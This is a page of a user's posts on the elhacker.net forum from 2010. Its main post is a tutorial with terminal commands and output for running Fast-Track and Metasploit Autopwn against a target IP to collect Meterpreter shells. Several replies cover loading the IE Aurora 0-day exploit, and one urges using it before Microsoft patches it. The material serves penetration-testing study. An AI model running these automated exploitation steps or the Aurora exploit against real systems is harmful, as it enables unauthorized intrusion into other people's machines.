elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 [354] 355 356 357 358 359 360 361 362 363 364 365 366 367 368
3531  Seguridad Informática / Hacking / Re: [Fast-Track + Metasploit] Autopwn Automation en: 22 Enero 2010, 00:43 am
Nunca dije que hiciera un Escaneo con Nessus, solo dije del comando Autopwn. xD
3532  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 21 Enero 2010, 23:03 pm
WTF!, No sé como instalaste ese MSF en WinVista, asi que lo unico que puedo decirte es esto... Mirad la siguiente ruta: \msf3\modules\exploits\windows\browser\, no veo que sea Windows/Exploits... xD

Intentad: use exploit/windows/ie_aurora

Hago una pregunta Stuped! Nombraste el Exploit como ie_aurora.rb?
3533  Seguridad Informática / Hacking / [Fast-Track + Metasploit] Autopwn Automation en: 21 Enero 2010, 22:11 pm
[Fast-Track + Metasploit] Autopwn Automation
[Metasploit] By: Shell Root


Fast-Track es un proyecto basado en Python de código abierto destinado a ayudar a los Pent-Test en un esfuerzo por identificar, explotar y además penetrar en una red.

Fast-Track utiliza una gran parte de la Metasploit Framework para terminar los ataques con éxito. Fast Track tiene una amplia variedad de ataques únicos que le permiten utilizar el marco de Metasploit a su máximo potencial.

Como alguna vez miramos en estos 2 Articulos.

Al momento de escanear y obtener resultados contundentes con el Scanner Nessus And/Or Nmap, podremos hacer uso del Comando Autopwn, ahora que es lo que hace Autopwn Automation? Esto lo que hace es automatizar todos los pasos anteriores con tan solo poner la IP. Parece un poco Lammer, pero es una gran opción, al momento de realizar varios Test de Penetración en diferentes sistemas computacionales. Miremos.

Ejecutamos el Script Fast-Track.py y damos como parametros el modo para interactuar. Recordad:
  • -c (Command Line Mode)
  • -g (Web GUI Mode)
Código:
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py
[sudo] password for shellroot:
Psyco not detected....Recommend installing it for increased speeds.

----------------------------------------------------------------

Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...

Automated Penetration Testing

Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com

Wiki and Bug Track: http://www.thepentest.com

Please read the README and LICENSE before using
this tool for acceptable use and modifications.

----------------------------------------------------------------
Modes:

Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g

Examples: ./fast-track.py -i
          ./fast-track.py -c
          ./fast-track.py -g
          ./fast-track.py -g <portnum>

Usage: ./fast-track.py <mode>

shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c
Psyco not detected....Recommend installing it for increased speeds.

----------------------------------------------------------------

Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...

Automated Penetration Testing

Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com

Wiki and Bug Track: http://www.thepentest.com

Please read the README and LICENSE before using
this tool for acceptable use and modifications.

----------------------------------------------------------------
Modes:

Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g

Examples: ./fast-track.py -i
          ./fast-track.py -c
          ./fast-track.py -g
          ./fast-track.py -g <portnum>

Usage: ./fast-track.py <mode>


************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************

**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST  (setup.py) ****

Visit http://trac.thepentest.com for tutorials or to file a bug.

1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About

Usage: fast-track.py -c <tool#>

shellroot@shellroot-desktop:~/fasttrack$

Seleccionamos el item Autopwn Automation
Código:
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2

Metasploit Autopwn Automated

Metasploit's Autopwn Function can require some knowledge in order
to set it up. Fast-Track tries to simplify that.

Simply type ./fast-track -c 2 <ipaddr or range> <-r or -b> (reverse or bind) to launch the exploits.

Usage: ./fast-track.py -c 2 <iprange> <-r or -b> <--reverse or bind

Examples: ./fast-track.py -c 2 192.168.1.1-254 -b
          ./fast-track.py -c 2 "-PN 192.168.1.1-254" -r
          ./fast-track.py -c 2 "-T 1 192.168.1.1/24" -r


shellroot@shellroot-desktop:~/fasttrack$

Miramos y Asignamos parametros son necesarios para correr el Exploit Automatizado.
Código:
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2 192.168.0.2 -r

Se creará una "Base de Datos", de nombre Pentest, y se ejecutará el Nmap con el Parametro IP o Rango Asignado. Ahora hará uso del comando Autopwn y esperametros a que termine de verificar los Exploit que pueden ser ejecutados por las vulnerabilidades encontradas en el sistema. Por ultimo esperaremos que nos entregue las sessiones el Meterpreter.

By: Shell Root
3534  Seguridad Informática / Hacking / Re: [Metasploit] Java Applet Infection en: 21 Enero 2010, 18:24 pm
Señores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell...
Madre mia esto vale oro...
jejeje

Joder, esto me tomo más de 1 Semana en ponerlo en practica!

Proximamente: Fast-Track And SET (Social Engineering Toolkit)
3535  Programación / .NET (C#, VB.NET, ASP) / Re: [VB.NET] Comparar Imagenes en: 21 Enero 2010, 01:57 am
Image Comparison in C#
Joder, Justo lo que necesitaba. Gracias seba123neo ;·)
3536  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 20 Enero 2010, 22:31 pm
Linux: ./msfconsole
Windows: msfconsole.bat
3537  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 20 Enero 2010, 21:23 pm
Ajam, Ademas el 0Day solo sacaran parche hasta Feb (Eso lei por ahi). Así que venga tio, a darle duro!
3538  Programación / .NET (C#, VB.NET, ASP) / [VB.NET] Comparar Imagenes en: 20 Enero 2010, 21:21 pm
Que tal, ando con una duda al crear una aplicacion, que lo unico que hace es comparar imagenes. Basicamente hace lo siguiente:

En 2 PictureBox tener la posibilidad de poner 2 Imagenes, al darle click en un Button, diga, Si son Iguales o no, y si se puede que diga por cuanto % es igual a la otra imagen.

Alguna pista de como crealo?
3539  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 20 Enero 2010, 20:48 pm
Para este ataque es necesario que la victima se conecte mediante IE?
Joder, Si el 0Day es de Microsoft, más especificamente en el producto Internet Explorer, tu que crees?
3540  Programación / PHP / Re: Como verificó esto en php? en: 20 Enero 2010, 17:21 pm
... sí una variable es "algo.otracosa.otramas"...
Ok. ¬¬

Código
  1. if ($strVariable == "algo.otracosa.otramas")

¬¬
Páginas: 1 ... 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 [354] 355 356 357 358 359 360 361 362 363 364 365 366 367 368
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines